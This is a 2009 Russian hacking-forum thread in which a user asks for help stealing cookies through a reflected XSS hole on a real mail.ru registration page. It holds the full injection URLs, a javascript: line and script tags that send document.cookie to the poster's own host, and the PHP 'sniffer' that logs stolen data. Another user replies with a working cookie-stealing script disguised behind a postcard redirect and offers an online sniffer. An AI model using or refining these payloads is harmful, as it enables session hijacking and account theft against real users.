Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
23.09.2009, 13:40
|
|
Новичок
Регистрация: 22.09.2009
Сообщений: 7
Провел на форуме:
32860
Репутация:
-5
|
|
вопрос по css
почему работает скрипт:
http://3k.mail.ru/register.php?step=4&nick=wildshaman&cfg=1,2,5,31,5 01,20,9&element=1&code="><script>alert('css')</script>
а этот не работает:
http://3k.mail.ru/register.php?step=4&nick=wildshaman&cfg=1,2,5,31,5 01,20,9&element=1&code="><script>img=new Image();img.src="http://slavaka1.metastock.ru/111.php?"+document.cookie();</script>
P.S. модераторам зачем удаляете мои темы? я жду помощи от людей.  |
|
|
23.09.2009, 14:04
|
|
Познающий
Регистрация: 19.03.2007
Сообщений: 97
Провел на форуме:
462465
Репутация:
23
|
|
а с чего он будет работать? и причем тут css?
|
|
|
|
23.09.2009, 14:11
|
|
Познающий
Регистрация: 29.11.2004
Сообщений: 80
Провел на форуме:
479552
Репутация:
6
|
|
Сообщение от plas
а с чего он будет работать? и причем тут css?
Сross Site Sсriрting
|
|
|
|
23.09.2009, 14:12
|
|
Новичок
Регистрация: 22.09.2009
Сообщений: 7
Провел на форуме:
32860
Репутация:
-5
|
|
ндааа. просто все рабочее, я хз в чем дело ? пассивку нашол, снифер работает а передать не хочет
|
|
|
|
23.09.2009, 14:16
|
|
Новичок
Регистрация: 22.09.2009
Сообщений: 7
Провел на форуме:
32860
Репутация:
-5
|
|
через эту строку могу куки передать:
javascript:var%20s=document.createElement('script' );s.src='http://slavaka1.metastock.ru/111.php?nc='+document.cookie;document.body.appendC hild(s);void(0);
а скриптом не получается.
Помогите люди добрые
или скиньте в личку пассивку рабочую
|
|
|
|
24.09.2009, 07:22
|
|
Новичок
Регистрация: 22.09.2009
Сообщений: 7
Провел на форуме:
32860
Репутация:
-5
|
|
администрация помогите мне
|
|
|
|
24.09.2009, 08:37
|
|
Новичок
Регистрация: 14.09.2009
Сообщений: 7
Провел на форуме:
126690
Репутация:
0
|
|
Сообщение от slavka1
администрация помогите мне
Администрация тебе не чем не обязана!так что не надо тут кричать.ты бы лучше толком пояснил что ты делал и что не получается?ото без 100грам не разобраться
|
|
|
|
24.09.2009, 08:45
|
|
Новичок
Регистрация: 22.09.2009
Сообщений: 7
Провел на форуме:
32860
Репутация:
-5
|
|
Здраствуйте уважаемый античат и участники форума.
У меня наболевщая пролемма.
начитавшись всевозможной информации по xss атакам я решил реализовать то что усвоил но пришол в тупик. проблемма наверняка для вас пустяковая, но мне не разобраться одному, поэтому прошу у вас помощи.
По схеме сделал сниффер:
PHP код:
<?php $fp=fopen("log.html","a+t"); fputs($fp," Время: ".date("[D d/m/Y H:i]")."<br> IP: ".$_SERVER['REMOTE_ADDR']."<br> Откуда: ".htmlentities($_SERVER['HTTP_REFERER'])."<br> Браузер: ".$_SERVER['HTTP_USER_AGENT']."<br> QUERY_STRING: ".$_SERVER['QUERY_STRING']."<br><br> "); fclose($fp); ?>
закачал его на хостинг
нашол на форуме в разделе "Пассивные xss на почтовый серверах" нашол эту самую xss:
Код:
http://3k.mai............nt=1&code="><script>alert('xss')</script>
(ссылку даю не полную так как возможно изза этого удаляют мои темы)
этот скрипт работает.
а если вписываешь в него строку со ссылкой инфы на снифер то ноль, вот такой код добавляю:
Код:
<script>img=new Image();img.src="адресс снифера?"+document.cookie();</script>
подскажите в чем проблема тут, фильтрация тегов?
или чтото другое? помогите пожалуста мне больше неккому обратиться. |
|
|
|
24.09.2009, 09:09
|
|
Новичок
Регистрация: 14.09.2009
Сообщений: 7
Провел на форуме:
126690
Репутация:
0
|
|
Сообщение от slavka1
Здраствуйте уважаемый античат и участники форума.
У меня наболевщая пролемма.
начитавшись всевозможной информации по xss атакам я решил реализовать то что усвоил но пришол в тупик. проблемма наверняка для вас пустяковая, но мне не разобраться одному, поэтому прошу у вас помощи.
По схеме сделал сниффер:
PHP код:
<?php $fp=fopen("log.html","a+t"); fputs($fp," Время: ".date("[D d/m/Y H:i]")."<br> IP: ".$_SERVER['REMOTE_ADDR']."<br> Откуда: ".htmlentities($_SERVER['HTTP_REFERER'])."<br> Браузер: ".$_SERVER['HTTP_USER_AGENT']."<br> QUERY_STRING: ".$_SERVER['QUERY_STRING']."<br><br> "); fclose($fp); ?>
закачал его на хостинг
нашол на форуме в разделе "Пассивные xss на почтовый серверах" нашол эту самую xss:
Код:
http://3k.mai............nt=1&code="><script>alert('xss')</script>
(ссылку даю не полную так как возможно изза этого удаляют мои темы)
этот скрипт работает.
а если вписываешь в него строку со ссылкой инфы на снифер то ноль, вот такой код добавляю:
Код:
<script>img=new Image();img.src="адресс снифера?"+document.cookie();</script>
подскажите в чем проблема тут, фильтрация тегов?
или чтото другое? помогите пожалуста мне больше неккому обратиться. Как я вкурил,ты хочеш получить куки методом отправки открытки img.держи рабочий скрипт
Код:
<script>img = new Image(); img.src = "адрес снифера"+document.cookie; // здесь ваш код для кражи кукис
// редирект через 3 сек.
var URL = "http://images.cards.mail.ru/11bolprivet.jpg" // адрес открытки, если хотите, можете изменить на свой =)
var speed = 3000
function reload() {
document.location = URL
}
setTimeout("reload()", speed);
</script>
сохраняй скрипт в расширение img и будет тебе счастье.а так по большому щету и твой скрипт должен быть рабочий.и если надо могу дать сылку на онлайн снифер  которым сам пользуюсь 
|
|
|
|
24.09.2009, 09:30
|
|
Новичок
Регистрация: 22.09.2009
Сообщений: 7
Провел на форуме:
32860
Репутация:
-5
|
|
о спасибо добрый человек, сейчас буду разбираться. спасибо еще раз
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
